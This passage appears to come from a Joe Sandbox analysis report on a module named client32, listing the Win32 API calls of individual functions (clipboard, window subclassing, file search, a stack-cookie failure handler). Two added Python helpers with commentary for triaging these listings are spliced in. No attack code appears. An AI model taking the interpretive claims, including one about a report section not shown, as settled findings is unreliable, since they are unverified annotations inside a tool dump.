• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
                                                                                                                                                                                                    • API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_memsetwsprintf
                                                                                                                                                                                                    • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                                                                                                                                                                    • API String ID: 3626227667-1552251038
                                                                                                                                                                                                    • Opcode ID: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
                                                                                                                                                                                                    • Instruction ID: 25b904e35b270628fa9a38861c68e686706e0c30f1396ea4e15f3982f5bea4d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97612674E41A1AEFD710DFA4CCC1FADF3A5AB8470DF104269EA265B2C0EB716940C792
APIs
• GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 687E862D
• free.MSVCR100(?,?,?,00000000), ref: 687E864E
• _calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 687E884F
• strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 687E8869
• GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 687E88D4
• _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 687E88E3
• GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 687E88FC
• free.MSVCR100(00000000), ref: 688106D9
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: InfoLocale$_calloc_crtfree$strncpy_s
• String ID:
• API String ID: 2432546303-0
• Opcode ID: bd0965a4c78a354b3d7a51f7eba73c108848ed11855bb36697273ebdc04c0b86
• Instruction ID: fd7c63a1a2577cc275688471a1b27ca759b541783fe213353fde4b45cc84d38f
• Opcode Fuzzy Hash: bd0965a4c78a354b3d7a51f7eba73c108848ed11855bb36697273ebdc04c0b86
• Instruction Fuzzy Hash: 0F51DD7194421AEFEF108F248E4DBAE3BA9BF02314F904465F828E2151EF319960CF70
APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
• RemovePropA.USER32(?), ref: 1115B1E5
• RemovePropA.USER32(?), ref: 1115B1F4
• RemovePropA.USER32(?,00000000), ref: 1115B203
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
• CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
• String ID: ..\ctl32\wndclass.cpp$old_wndproc
• API String ID: 1777853711-3305400014
• Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
• Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
• Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
• Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1
APIs
• OpenClipboard.USER32(?), ref: 1101F387
• GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
• GlobalLock.KERNEL32(00000000), ref: 1101F3A0
• _memmove.LIBCMT ref: 1101F3A9
• GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
• EmptyClipboard.USER32 ref: 1101F3B8
• SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
• GlobalFree.KERNEL32(00000000), ref: 1101F3CC
• MessageBeep.USER32(00000030), ref: 1101F3D4
• CloseClipboard.USER32 ref: 1101F3DA
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
• String ID:
• API String ID: 3255624709-0
• Opcode ID: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
• Instruction ID: a74b028ba7232528d54cbd7924e13de8c44cceb4ce50299c474c183637a6b5bc
• Opcode Fuzzy Hash: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
• Instruction Fuzzy Hash: 67019276A012636BD3026B748CCCE5FBBACDF55349704C079F626C6109EB74C8058762
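The two listings above (the wndclass.cpp function at 1115B1C6 that puts an old_wndproc back with SetWindowLongA and the clipboard writer at 1101F387) print every Win32 argument as raw hex, so the reader has to know that 00002002 is GMEM_MOVEABLE|GMEM_DDESHARE, 00000001 is CF_TEXT, 00000030 is MB_ICONEXCLAMATION and 00001004 is LOCALE_IDEFAULTANSICODEPAGE. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the analysed client32 module: it parses the report's "Name.MODULE(args), ref: ADDR" lines, names those constants (values from the Windows SDK headers), and flags the capability patterns the call sequences form. The two sample listings embedded in it are copied from this report. The ApiCall record, parse_listing, decode, classify and triage helpers and the pattern labels are mine; reading 000000FC as GWL_WNDPROC (-4 printed as a sign-extended 8-bit immediate) is an assumption, supported by the old_wndproc string the report lists for the same function.

```python
"""Triage helper for per-function API listings in a Joe Sandbox report.
Added example, not part of the report or of the analysed binary."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ApiCall:
    name: str                         # API name, e.g. SetClipboardData
    module: str                       # module the report resolved it to, e.g. USER32
    args: list                        # argument tokens as printed; "?" = unresolved
    ref: str                          # call-site address
    subcall_of: Optional[str] = None  # callee address on "Part of subcall function X:" lines


# Matches the three line shapes the report uses:
#   "• OpenClipboard.USER32(?), ref: 1101F387"
#   "• EmptyClipboard.USER32 ref: 1101F3B8"                      (no argument list)
#   "• Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9"
_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# (API name, argument index) -> {value: symbolic name}, values from the Windows SDK headers.
# 0xFC is an assumption: GWL_WNDPROC is -4 and the report appears to print the
# sign-extended 8-bit immediate rather than FFFFFFFC.
CONSTANTS = {
    ("SetWindowLongA", 1): {0xFFFFFFFC: "GWL_WNDPROC", 0xFC: "GWL_WNDPROC, assumed imm8"},
    ("GlobalAlloc", 0): {0x2002: "GMEM_MOVEABLE|GMEM_DDESHARE"},
    ("SetClipboardData", 0): {0x1: "CF_TEXT"},
    ("MessageBeep", 0): {0x30: "MB_ICONEXCLAMATION"},
    ("GetLocaleInfoW", 1): {0x1004: "LOCALE_IDEFAULTANSICODEPAGE"},
}

# label -> (scope, API names that must all appear). "direct" = called by the function
# itself, "subcall" = reached through a callee the report expanded inline.
PATTERNS = {
    "clipboard write": ("direct", {"OpenClipboard", "EmptyClipboard", "SetClipboardData", "CloseClipboard"}),
    "window subclass restore": ("direct", {"SetWindowLongA", "CallWindowProcA"}),
    "message box then ExitProcess": ("subcall", {"MessageBoxA", "ExitProcess"}),
}


def parse_listing(text: str) -> list:
    """Turn the report's API lines into ApiCall records; headings and blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("mod"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def _hex_value(tok: str) -> Optional[int]:
    """Printed argument as a 32-bit value; None for "?" or a string literal such as Client32."""
    try:
        return int(tok, 16) & 0xFFFFFFFF   # "-00000001" normalises to 0xFFFFFFFF
    except ValueError:
        return None


def decode(call: ApiCall) -> list:
    """Argument list with known constants annotated, e.g. "00000001 (CF_TEXT)"."""
    out = []
    for i, tok in enumerate(call.args):
        name = CONSTANTS.get((call.name, i), {}).get(_hex_value(tok))
        out.append(f"{tok} ({name})" if name else tok)
    return out


def classify(calls: list) -> set:
    """Capability labels whose required APIs all occur in the required scope."""
    seen = {"direct": set(), "subcall": set()}
    for c in calls:
        seen["subcall" if c.subcall_of else "direct"].add(c.name)
    found = {label for label, (scope, need) in PATTERNS.items() if need <= seen[scope]}
    # A SetWindowLongA that does not target GWL_WNDPROC is not a window-procedure swap.
    if "window subclass restore" in found and not any(
        c.name == "SetWindowLongA" and len(c.args) > 1
        and _hex_value(c.args[1]) in (0xFC, 0xFFFFFFFC) for c in calls
    ):
        found.discard("window subclass restore")
    return found


def triage(text: str) -> dict:
    calls = parse_listing(text)
    return {"calls": len(calls),
            "decoded": [f"{c.name}({', '.join(decode(c))}) @ {c.ref}" for c in calls],
            "patterns": classify(calls)}


# Sample input: the two function listings copied from this report.
SUBCLASS_FUNC = """
• SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
• RemovePropA.USER32(?), ref: 1115B1E5
• RemovePropA.USER32(?), ref: 1115B1F4
• RemovePropA.USER32(?,00000000), ref: 1115B203
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
• CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A
"""
CLIPBOARD_FUNC = """
• OpenClipboard.USER32(?), ref: 1101F387
• GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
• GlobalLock.KERNEL32(00000000), ref: 1101F3A0
• _memmove.LIBCMT ref: 1101F3A9
• GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
• EmptyClipboard.USER32 ref: 1101F3B8
• SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
• GlobalFree.KERNEL32(00000000), ref: 1101F3CC
• MessageBeep.USER32(00000030), ref: 1101F3D4
• CloseClipboard.USER32 ref: 1101F3DA
"""

if __name__ == "__main__":
    for label, text in (("1115B1C6", SUBCLASS_FUNC), ("1101F387", CLIPBOARD_FUNC)):
        result = triage(text)
        print(f"function at {label}: {result['calls']} calls, patterns={sorted(result['patterns'])}")
        for entry in result["decoded"]:
            print("   ", entry)
```

The pattern labels are deliberately narrower than the report's own signature names: "clipboard write" requires the Open/Empty/SetClipboardData/Close sequence on the function itself, and "window subclass restore" additionally checks that the SetWindowLongA index really is GWL_WNDPROC, so an unrelated SetWindowLongA call does not trigger it. Extending CONSTANTS and PATTERNS is the intended way to cover further listings from the same report.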
APIs
• IsIconic.USER32(?), ref: 11157677
• ShowWindow.USER32(?,00000009), ref: 11157687
• BringWindowToTop.USER32(?), ref: 11157691
• IsWindow.USER32(00000000), ref: 111576D0
• IsIconic.USER32(00000000), ref: 111576DB
• ShowWindow.USER32(00000000,00000009), ref: 111576E8
• BringWindowToTop.USER32(00000000), ref: 111576EF
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$BringIconicShow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2588442158-0
                                                                                                                                                                                                    • Opcode ID: 038ff0c7e592a338b47f23a8c12551223a3be2bd5e1829126b81d4076912602b
                                                                                                                                                                                                    • Instruction ID: a9c9b89abb11ca8be4b118751fbd9485df176094a83bcf99db43cce38e22dc7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 038ff0c7e592a338b47f23a8c12551223a3be2bd5e1829126b81d4076912602b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D431E575A00A2A9FD751CF54D985BAEF7B8FF45714F00816AE921E3380EB35A901CFA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6885C224
                                                                                                                                                                                                    • _crt_debugger_hook.MSVCR100(00000001), ref: 6885C231
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6885C239
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(6885C270), ref: 6885C244
                                                                                                                                                                                                    • _crt_debugger_hook.MSVCR100(00000001), ref: 6885C255
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 6885C260
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 6885C267
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3369434319-0
                                                                                                                                                                                                    • Opcode ID: 78bd99e24d1df68432f8adfde306c0eb0bf8fef7beb17e730f44dedcae534051
                                                                                                                                                                                                    • Instruction ID: b70402e0b7db25f358a7d0cff23d07dc08402f251128e2e16c7c560bbf75bc3a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78bd99e24d1df68432f8adfde306c0eb0bf8fef7beb17e730f44dedcae534051
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B21C9F8981244CFDBA0DF6CD588A8C7BA4BB0B310F50086AE52D82641E7B06984CF96
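The seven-call sequence in the block above (IsDebuggerPresent, _crt_debugger_hook(1) twice, SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess with status C0000409) is the MSVC 2010 CRT's __report_gsfailure, the handler reached when a /GS stack-cookie check fails; 0xC0000409 is STATUS_STACK_BUFFER_OVERRUN. Its IsDebuggerPresent call is compiler-runtime boilerplate, so on its own it does not support the "checks if a debugger is running" signature listed at the top of this report. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses function blocks in the layout shown on this page (the excerpt embedded in it is constructed from this report's own lines) and separates that known CRT stub from debugger-related calls that still deserve manual review. The signature tuple, the list of debugger-related APIs and the helper names are assumptions of this example, not Joe Sandbox data.

```python
"""Triage Joe Sandbox per-function API listings: separate MSVC CRT boilerplate
from API sequences that an analyst should actually look at.

Added example, not part of the Joe Sandbox report. The excerpt below is
constructed from the block layout seen on this page ("APIs", one bullet per
call, then "Memory Dump Source" with the owning module's dump and base).
"""
import re
from dataclasses import dataclass, field

REPORT_EXCERPT = """\
APIs
• IsDebuggerPresent.KERNEL32 ref: 6885C224
• _crt_debugger_hook.MSVCR100(00000001), ref: 6885C231
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6885C239
• UnhandledExceptionFilter.KERNEL32(6885C270), ref: 6885C244
• _crt_debugger_hook.MSVCR100(00000001), ref: 6885C255
• GetCurrentProcess.KERNEL32(C0000409), ref: 6885C260
• TerminateProcess.KERNEL32(00000000), ref: 6885C267
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
APIs
• GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 11059281
• FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 1105928F
• LocalFree.KERNEL32(?,?,?,1105990A,DuplicateHandle), ref: 11059299
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
"""

# One call line: "Name.MODULE(args), ref: VA". The parenthesised arguments are
# optional (IsDebuggerPresent has none). Nested "Part of subcall function ..."
# lines do not match this pattern and are skipped on purpose.
API_LINE = re.compile(
    r"^•\s+(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?"
    r"\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SOURCE_LINE = re.compile(
    r"^•\s+Source File:\s+(?P<dump>\S+),\s+Offset:\s+(?P<base>[0-9A-Fa-f]+)"
)


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: int  # call-site virtual address as printed in the report


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    dump: str = ""  # memory dump the function was lifted from
    base: int = 0   # module base, the "Offset:" value in the report

    def rva(self, ref: int) -> int:
        """Call-site RVA inside the dumped module, usable as an IDA offset."""
        return ref - self.base

    def api_sequence(self) -> tuple:
        return tuple(c.name for c in self.calls)


def parse_blocks(report_text: str) -> list:
    """Split the flat report text into one FunctionBlock per "APIs" header."""
    blocks, current = [], None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.calls.append(Call(m["name"], m["module"], args, int(m["ref"], 16)))
            continue
        m = SOURCE_LINE.match(line)
        if m:
            current.dump, current.base = m["dump"], int(m["base"], 16)
    return blocks


# Assumed signature of MSVC's __report_gsfailure as it appears in these
# listings: exactly this call order, exiting with STATUS_STACK_BUFFER_OVERRUN.
GSFAILURE_SEQ = (
    "IsDebuggerPresent", "_crt_debugger_hook", "SetUnhandledExceptionFilter",
    "UnhandledExceptionFilter", "_crt_debugger_hook", "GetCurrentProcess",
    "TerminateProcess",
)
STATUS_STACK_BUFFER_OVERRUN = "C0000409"
# APIs worth a manual look when they occur outside known CRT code (assumed list).
DEBUGGER_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                 "OutputDebugStringA", "OutputDebugStringW",
                 "NtQueryInformationProcess"}


def is_gsfailure(block: FunctionBlock) -> bool:
    """True only for the exact CRT sequence with the 0xC0000409 status visible."""
    return (block.api_sequence() == GSFAILURE_SEQ
            and any(STATUS_STACK_BUFFER_OVERRUN in c.args for c in block.calls))


def classify(block: FunctionBlock) -> str:
    if is_gsfailure(block):
        return "crt-boilerplate: MSVC __report_gsfailure (stack-cookie failure handler)"
    hits = sorted(set(block.api_sequence()) & DEBUGGER_APIS)
    if hits:
        return "review: debugger-related API outside known CRT code: " + ", ".join(hits)
    return "no debugger-related API"


def triage(report_text: str) -> list:
    """(dump name, RVA of first call site, verdict) for every function block."""
    out = []
    for b in parse_blocks(report_text):
        first = b.calls[0].ref if b.calls else b.base
        out.append((b.dump, b.rva(first), classify(b)))
    return out


if __name__ == "__main__":
    for dump, rva, verdict in triage(REPORT_EXCERPT):
        print(f"{dump} +{rva:06X}: {verdict}")
```

Running it against the excerpt labels the 687D0000 module's function as CRT boilerplate at RVA 0x8C224 and the 11000000 module's GetLastError/FormatMessageA/LocalFree function as carrying no debugger-related API; any block that calls IsDebuggerPresent without the full gsfailure sequence comes back as "review", which is where an analyst's time belongs.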
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR100(00000354,?,?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CAB5
                                                                                                                                                                                                      • Part of subcall function 687E0B31: malloc.MSVCR100(00000001,00000001,00000001,?,687EA974,00000018,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687E0B3D
                                                                                                                                                                                                    • FindClose.KERNEL32(?,?,?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CAD2
                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(-00000002,00000000,00000000,00000000,00000000,?,?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CAEB
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CB12
                                                                                                                                                                                                    • FindClose.KERNEL32(?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CB22
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1203757345-0
                                                                                                                                                                                                    • Opcode ID: 92cbabc2f9a1ef4587d4b5e7ae3efdeff82cc2badaa52c79f495b87752d46744
                                                                                                                                                                                                    • Instruction ID: f759d614d62cc3dc2bd2e9ba2d963b178aad4b34b066dec83d134058d813da76
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cbabc2f9a1ef4587d4b5e7ae3efdeff82cc2badaa52c79f495b87752d46744
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C019AF1189562EFCF11AF29CE288AE3EAAFB0B7A03504825F42DD1551C330C181CBE0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __time64.LIBCMT ref: 1101D213
                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
                                                                                                                                                                                                    • GetLocalTime.KERNEL32(00000002), ref: 1101D25C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
